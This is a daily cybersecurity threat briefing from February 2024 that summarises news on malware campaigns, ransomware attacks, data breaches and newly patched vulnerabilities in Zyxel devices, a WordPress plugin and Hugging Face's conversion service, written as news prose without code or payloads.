Cyware Daily Threat Intelligence

Daily Threat Briefing • Feb 27, 2024
This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.
Daily Threat Briefing • Feb 27, 2024
Beware of that email disguised as hotel reservation refund inquiries from Booking[.]com. Recently, security experts uncovered a malicious campaign containing PDF attachments about travel inquiries, leading to Agent Tesla infections on compromised hosts. A variant of Gh0st RAT has surfaced in the wild. Active at least since 2018, it specifically targets Linux servers, stealing sensitive data while executing other malicious commands on infected hosts.
Through the abuse of 8,000 brand-linked domains and 13,000 subdomains, cybercriminals are sending millions of fraudulent emails for scams and malvertising, daily. The campaign also impersonates MSN and eBay domains. Parallely, a 14-year-old CMS editor was exploited to compromise education and government entities worldwide. The developers issued a warning advising against its continued use.
Healthcare software maker targeted
medQ, Inc., a radiology workflow provider, reported a data breach to the Attorney General of Maine after discovering unauthorized access to its software platform. The breach exposed names, SSNs, health data, and more. Affected individuals have started receiving breach notification letters, and have been urged to take precautions against potential fraud and identity theft.
Akira ransomware strikes Sweden municipality
The notorious Akira ransomware group allegedly crippled the municipality of Bjuv in South Sweden, threatening to leak nearly 200GB of stolen data. The data trove includes confidential documents and personal HR files. Despite the cyberattack claim, Bjuv Municipality's website remains operational, raising doubts about the authenticity of the threat.
Automotive firm hit, systems down
ThyssenKrupp, a major steel producer, confirmed a cyberattack on its Automotive division, leading to the shutdown of IT systems. The breach impacted the Automotive Body Solutions business unit, with unauthorized access to its IT infrastructure. While production was halted at the Saarland plant, customer supply remained unaffected. As of now, the type of breach remains undisclosed, with no specific threat actor claiming responsibility.
LoanDepot confirmed nearly 17 million victims
LoanDepot, a major U.S. loan and mortgage company, revealed that almost 17 million customers had their sensitive personal information stolen in a ransomware attack that occurred last month. The stolen data includes names, dates of birth, email and postal addresses, financial account numbers, phone numbers, and SSNs. LoanDepot did not disclose whether they paid a ransom.
Gh0st RAT Linux variant used in attacks
ASEC uncovered Nood RAT, a Gh0st RAT variant for Linux, being utilized in malware campaigns aiming to pilfer sensitive data from Linux servers. The RAT serves as a potent backdoor, enabling various malicious activities such as file downloads, system file theft, and command execution. The analysis laid bare the malware’s construction, including a builder program and encryption methods.
UAC-0184 expands stealthy attacks with IDAT
The hacking group UAC-0184 has evolved its tactics, employing steganographic image files to distribute the Remcos RAT to a Ukrainian entity in Finland. The attack was initiated through carefully crafted phishing emails, utilizing a modular malware loader, named IDAT, that employs sophisticated evasion techniques, such as dynamic loading of Windows API functions, HTTP connectivity tests, process blocklists, and syscalls.
Travel booking scam drops malware
Security researchers at Forcepoint have uncovered a cybercrime campaign utilizing poisoned PDF files disguised as hotel reservation inquiries from popular travel service providers like Booking[.]com. The emails claim erroneous credit card charges, urging recipients to investigate by opening the attachment. However, opening the PDF triggers the download of Agent Tesla RAT, enabling hackers to log keystrokes, steal data, and execute commands remotely.
Critical bugs in firewalls and access points
Zyxel, the Taiwanese networking vendor, patched four critical flaws, including CVE-2023-6397, CVE-2023-6398, CVE-2023-6399, and CVE-2023-6764, in its firewalls and access points. Threat actors could leverage these vulnerabilities to execute operating system commands, cause DoS conditions, or achieve unauthorized remote code execution, posing significant security risks to affected devices. Zyxel has urged users to apply the necessary patches to mitigate these risks effectively.
Attackers exploit outdated CMS editor
Threat actors leveraged an open redirect flaw in the outdated FCKeditor plugin to target websites of educational and government institutions globally. By exploiting open redirects, attackers manipulate search results with malicious content, including scam sites and phishing pages. Despite the plugin's deprecation in 2010, many organizations still use it, making them vulnerable to exploitation.
Vulnerability puts machine learning models at risk
Cybersecurity researchers identified a vulnerability in the Hugging Face Safetensors conversion service. The flaw allows malicious actors to compromise machine learning models submitted by users, leading to supply chain attacks. This vulnerability poses a significant risk not only to the security of machine learning models but also to the datasets stored on Hugging Face.
Critical SQL Injection flaw in WordPress plugin
A critical security flaw (CVE-2024-1071) has been discovered in the popular WordPress plugin Ultimate Member, concerning over 200,000 active installations. The vulnerability allows unauthenticated attackers to execute SQL injection attacks via the 'sorting' parameter, potentially leading to data extraction from the database. Users who have enabled the "Enable custom table for usermeta" option are affected. A fix has been released in version 2.8.3. Users are urged to update immediately.
Massive ad fraud campaign spotted
An ad fraud campaign, dubbed ‘SubdoMailing,’ has come to light that utilizes over 8,000 legitimate domains and 13,000 subdomains, to bypass security filters. It includes the likes of major brands, such as MSN, VMware, and eBay, that criminals abuse to send millions of scam emails daily. By hijacking abandoned subdomains of trusted brands, threat actors launch fraudulent schemes via fake giveaways or surveys to trick users. The daily number of emails reaching targets exceeds 5,000,000.
Chinese users warned about fake apps
China's Ministry of Industry and Information Technology has issued a warning about the circulation of fake wallet apps for the nation's central bank digital currency (CBDC), known as the digital renminbi or e-Yuan. These apps are being used by scammers to deceive users into providing personal information or paying money under false pretenses.